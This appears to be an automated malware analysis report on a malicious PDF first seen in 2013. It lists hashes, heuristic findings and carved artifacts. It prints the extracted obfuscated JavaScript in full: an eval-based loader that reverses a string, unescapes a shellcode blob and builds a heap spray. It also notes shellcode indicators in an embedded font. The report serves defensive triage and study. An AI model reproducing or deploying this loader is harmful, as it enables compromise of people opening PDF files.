PDF malware analysis — malicious · 8b894e82de831279

MALICIOUS

PDF

69.1 KB First seen: 2013-02-24

MD5: 8c91ce3feb241c1d1acdaec7f9677973 SHA-1: daffe4743179915f4c83adf3fa43860d4af3f90a SHA-256: 8b894e82de8312794757e0a7a6c90d210bbe5c0abd07dcb2b7ce73f1442a155b

68 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 0.9996

Heuristics 4

Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://www.bitstream.com In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0012_000.js`	pdf-javascript-stream	PDF /JS object 12 at offset 0x104F0	3639 bytes
SHA-256: `0733f35c439ec43251d2d3a6f114f1c588485d5d34a46aec0d41955ac61b9ba2`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var eva=new Function("a","ev al (a);".split(" ").join("")); var s=' ;"s"+3_ozotlav=]i[rra )++i;0f1x0<i;0=i( rof ;)(yarrA wen = rra rav ;)2 / )80x0-0201x0( - 00008x0 ,0(gnirtsbus.d_ozotlav = 3_ozotlav ;d_ozotlav =+ d_ozotlav )00008x0 < htgnel.d_ozotlav(elihw ;)2/63556 ,0(gnirtsbus.b_ozotlav = d_ozotlav ;c_ozotlav =+ b_ozotlav ;olygak =+ b_ozotlav ;)2/)42x0-c0c0x0( ,0(gnirtsbus.c_ozotlav = b_ozotlav ;c_ozotlav=+c_ozotlav )63556 < 8 + 02 + htgnel.c_ozotlav( elihw ;) "c" + "0" + "c" + "0" + "u" + "%" + "c" + "0" + "c" + "0" + "u" + "%" (epak = c_ozotlav rav ;) lp (epak = olygak rav ;epacsenu = epak rav } } ]j[lp =+ ipmet esle ;"%" =+ ipmet )"Q" == ]j[lp( fi { )"P" =! ]j[lp( fi { )++j;htgnel.lp<j;0=j( rof ;"" = ipmet rav ;"7b14uQe4e6uQ6a69uQ6a4cuQ743fuQ4340uQ42c6uQ43d0uQ20fbuQb185uQeedcuQe5eduQa98cuQ99ebuQf603uQc9c3uQ0b2fuQ0fabuQ02fauQ853duQ9758uQ7a89uQaa0auQ0d40uQ12f2uQ7b53uQe1f7uQ7b52uQ3663uQ027auQ9385uQ43d9uQ13aauQb473uQ122cuQ4e70uQ0766uQe366uQ45d3uQ4614uQ374buQfeebuQ7c88uQ8e96uQf948uQ30d1uQ4d68uQecb7uQfe77uQ40bduQaefcuQedd4uQ92cauQ32a4uQ1df4uQ8bf3uQ5976uQ53d3uQaa64uQ9c15uQ1477uQf1f1uQ1b46uQ214auQc4d2uQdb7buQc6c0uQ5b8euQ2249uQ4035uQ8144uQf69duQd127uQfce9uQ9c5fuQ3ff9uQcb7auQ04e6uQ3e8auQfaa3uQ2a4buQa5b3uQa9b7uQ50bduQ6e16uQ5c9buQ62dauQ4377uQff28uQ378buQ7dd6uQ0e4buQ1757uQbcf3uQ1f71uQ65feuQ2825uQ76dbuQb07buQ69aduQ0e74uQd729uQ3832uQ65e0uQe030uQ1365uQ4fe5uQ4742uQed9duQ51bduQ1807uQabdcuQ1b33uQ339cuQ0070uQf211uQ0070uQ137duQ0070uQd451uQff09uQffffuQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQ0909uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQ0909uQff09uQ0070uQbb51uQ0070uQ227auQ0070uQd451uQffffuQ8e6euQ0070uQbb51uQ0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPbPeP5P0PuPQP5P7PePePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP1P8PbPfPuPQP2PcP4P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P0P3P8PuPQP3P8P0PcPuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP9P8P8P1PuPQPbP8PaP1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP5P1P8P5PuPQPaP5PbPePuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2P2P7PaPuPQP0P0P7P0PuPQPdP4P5P1PuPQP4P5P0P9PuPQPaP5P0P9PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP1P3P7PdPuPQP0P0P0P0PuPQP0P4P0P0PuPQP0P0P0P0PuPQP0P0P0P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P0P0PuPQP0P0P0P0PuPQP1P0P0P0PuPQP0P0P1P0PuPQPfPfPfPfPuPQPfPfPfPfPuPQP0P0P7P0PuPQP4P5PcP5PuPQP0P0P7P0PuPQP2PeP2P5PuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP0P0P1P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPcPaP8PaPuPQP1P0P0P0PuPQP1P1P0P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQP2PbPfP7PuPQPePfPfP7PuPQP0P0P3P0PuPQP0P0P7P0PuPQPbPbP5P1PuPQP0P0P7P0PuPQPdP4P5P1PuPQP0P0P0P0PuPQP0P0P0P1PuPQP0P0P7P0PuPQPbPbP5P1PuPQP1P0P0P0PuPQP4P0P1P0PuPQP0P0P7P0PuPQP7PfP2P7PuPQP1P0P0P0PuPQP4P2P1P0PuPQP0P0P7P0PuPQP9P9P5P1PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcP0PcP0PuPQPcP0PcP0PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP3P3P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQP0P0P7P0PuPQP4P8P0P9PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQPfP6P5P1PuPQP0P0P7P0PuPQPfPeP8P4PuPQPcPcPcPcPuPQPcPcPcPcPuPQP0P0P7P0PuPQP9P1P9P4PuPQPcP0PcP0PuPQPcP0PcP0PuPQP" = lp rav '; eva(s.split("").reverse().join(""));
`font_00_sfnt_off00000319.bin`	pdf-font-stream	PDF embedded font (sfnt) at offset 0x319	65932 bytes
SHA-256: `67cf5b115c479e7cc69ef02607414d718125a1e117a59d537db3e97682d5b723`
Detection ClamAV: No threats found Obfuscation or payload: likely Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x41 (A)

Open this report in the interactive analyzer, or submit your own file for analysis.